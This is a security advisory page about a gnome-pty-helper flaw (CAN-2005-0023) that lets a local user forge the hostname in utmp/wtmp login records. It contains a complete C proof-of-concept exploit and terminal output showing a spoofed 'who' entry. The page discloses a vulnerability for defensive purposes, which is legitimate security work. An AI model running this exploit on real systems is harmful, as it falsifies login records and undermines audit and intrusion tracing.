SecuriTeam - gnome-pty-helper utmp Display Spoofing

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

"gnome-pty-helper is a program that setuid application used to open a pseudo-terminal, set the permissions, owner-ship and record user login information."

gnome-pty-helper can be made to write utmp/wtmp records with arbitrary DISPLAY (host) settings.

Credit:
The information has been provided by Paul Szabo.
Debian Bug report can be found at: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=330907
The vendor bug report can be found at: http://bugzilla.gnome.org/show_bug.cgi?id=317312

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

gnome-pty-helper allows attackers to spoof a local UTMP hostname due to a failure of the application to properly validate user-supplied data prior to using it to update UTMP records.

CVE Information:
CAN-2005-0023

Proof of Concept:
psz@savona:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz pts/2 Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz pts/2 Sep 20 08:40 (xyz)
psz pts/1 Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
psz 31358 0.0 0.3 10340 7768 ? S 08:14 0:00 xterm -T psz@savona -n psz@savona -sb -sl 10000 -ls
psz 31444 0.0 0.0 1484 380 pts/1 S 08:21 0:00 gnome-pty-helper-exploit xyz
psz 31446 0.0 0.0 1696 604 pts/1 S 08:21 0:00 gnome-pty-helper
psz 31454 0.0 0.0 2496 848 pts/1 R+ 08:21 0:00 ps aux
[1]+ Done gnome-pty-helper-exploit xyz
psz pts/1 Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)

CODE:

/*
    Must be compiled against (within)
gnome-libs-1.4.2/zvt
    because it uses *.h files from there.
    Code "stolen" from subshell.c .
*/

#include <sys/types.h>

#include "subshell-includes.h"
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG 4

/* Pid of the helper SUID process */
static pid_t helper_pid;

/* The socketpair used for the protocol */
int helper_socket_protocol [2];

/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];

#include <sys/socket.h>
#include <sys/uio.h>

static struct cmsghdr *cmptr;
#define CONTROLLEN sizeof (struct cmsghdr) + sizeof (int)

static int
receive_fd (int helper_fd)
{
struct iovec iov [1];
struct msghdr msg;
char buf [32];

iov [0].iov_base = buf;
iov [0].iov_len = sizeof (buf);
msg.msg_iov = iov;
msg.msg_iovlen = 1;
msg.msg_name = NULL;
msg.msg_namelen = 0;

if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
  return -1;
msg.msg_control = (caddr_t) cmptr;
msg.msg_controllen = CONTROLLEN;

if (recvmsg (helper_fd, &msg, 0) <= 0)
  return -1;

return *(int *) CMSG_DATA (cmptr);
}

static int
s_pipe (int fd [2])
{
return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}

static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
GnomePtyOps op;
int result, n;
void *tag;

if (helper_pid == -1)
  return NULL;

if (helper_pid == 0){
  if (s_pipe (helper_socket_protocol) == -1)
   return NULL;

  if (s_pipe (helper_socket_fdpassing) == -1){
   close (helper_socket_protocol [0]);
   close (helper_socket_protocol [1]);
   return NULL;
  }

  helper_pid = fork ();

  if (helper_pid == -1){
   close (helper_socket_protocol [0]);
   close (helper_socket_protocol [1]);
   close (helper_socket_fdpassing [0]);
   close (helper_socket_fdpassing [1]);
   return NULL;
  }

  if (helper_pid == 0){
   close (0);
   close (1);
   dup2 (helper_socket_protocol [1], 0);
   dup2 (helper_socket_fdpassing [1], 1);

   /* Close aliases */
   close (helper_socket_protocol [0]);
   close (helper_socket_protocol [1]);
   close (helper_socket_fdpassing [0]);
   close (helper_socket_fdpassing [1]);

   execl ("/usr/sbin/gnome-pty-helper", "gnome-pty-helper", NULL);
   exit (1);
  } else {
   close (helper_socket_fdpassing [1]);
   close (helper_socket_protocol [1]);

   /*
    * Set the close-on-exec flag for the other
    * descriptors, these should never propagate
    * (otherwise gnome-pty-heler wont notice when
    * this process is killed).
    */
   fcntl (helper_socket_protocol [0], F_SETFD, FD_CLOEXEC);
   fcntl (helper_socket_fdpassing [0], F_SETFD, FD_CLOEXEC);
  }
}
op = GNOME_PTY_OPEN_NO_DB_UPDATE;

if (update_wutmp & ZVT_TERM_DO_UTMP_LOG){
  if (update_wutmp & (ZVT_TERM_DO_WTMP_LOG | ZVT_TERM_DO_LASTLOG))
   op = GNOME_PTY_OPEN_PTY_LASTLOGUWTMP;
  else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG)
   op = GNOME_PTY_OPEN_PTY_UWTMP;
  else if (update_wutmp & ZVT_TERM_DO_LASTLOG)
   op = GNOME_PTY_OPEN_PTY_LASTLOGUTMP;
  else
   op = GNOME_PTY_OPEN_PTY_UTMP;
} else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG) {
  if (update_wutmp & (ZVT_TERM_DO_WTMP_LOG | ZVT_TERM_DO_LASTLOG))
   op = GNOME_PTY_OPEN_PTY_LASTLOGWTMP;
  else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG)
   op = GNOME_PTY_OPEN_PTY_WTMP;
} else
  if (update_wutmp & ZVT_TERM_DO_LASTLOG)
   op = GNOME_PTY_OPEN_PTY_LASTLOG;

if (write (helper_socket_protocol [0], &op, sizeof (op)) < 0)
  return NULL;

n = read (helper_socket_protocol [0], &result, sizeof (result));
if (n == -1 || n != sizeof (result)){
  helper_pid = 0;
  return NULL;
}

if (result == 0)
  return NULL;

n = read (helper_socket_protocol [0], &tag, sizeof (tag));

if (n == -1 || n != sizeof (tag)){
  helper_pid = 0;
  return NULL;
}

*master = receive_fd (helper_socket_fdpassing [0]);
*slave = receive_fd (helper_socket_fdpassing [0]);

return tag;
}

int main (int argc, char* argv[])
{
int slave_pty, master_pty;
void* mytag;
int log = ZVT_TERM_DO_UTMP_LOG;
char buf[1000];

printf("Writing utmp (who) record for DISPLAY=%s\n", argv[1]);
setenv("DISPLAY",argv[1],1);

if ((mytag = get_ptys (&master_pty, &slave_pty, log)) == NULL)
  return;

sprintf(buf,"who | grep %s",argv[1]);
printf("Running %s\n",buf);
system(buf);
printf("utmp (who) record will be cleaned up when we exit.\n");
printf("To leave it behind, kill gnome-pty-helper: kill %d\n",helper_pid);

printf("Sleeping for 5 secs...\n");
sleep (5);
}

/* EoF */

blog comments powered by Disqus

	ProFTPD Response Pool Use-After-Free Code Execution Vulnerability
	Insight Control for Linux Multiple Vulnerabilities
	HP-UX Running NFS/ONCplus Denial of Service Vulnerability
	HP-UX Running BIND Denial of Service Vulnerability 2011
	HP-UX Running XNTP Denial of Service Vulnerability
	HP-UX Denial of Service Vulnerability
	Webkit Detached Body Element Code Execution Vulnerability
	Mac OS X Compact Font Format Decoder Code Execution Vulnerability
	WebKit WBR Tag Removal Code Execution Vulnerability
	Webkit Undefined DOM Prototype Attach Code Execution Vulnerability
	Apple HFS Information Disclosure Vulnerability
	XPDF arbitrary Arbitrary Code Execution Vulnerabilities
	Hewlett-Packard Data Protector Client EXEC_CMD omni_chk_ds.sh Code Execution Vulnerability
	Red Hat OpenJDK IcedTea6 ClassLoader Code Execution Vulnerability
	HP-UX Apache Running Tomcat Servlet Engine Remote Modification and Denial of Service Vulnerabilities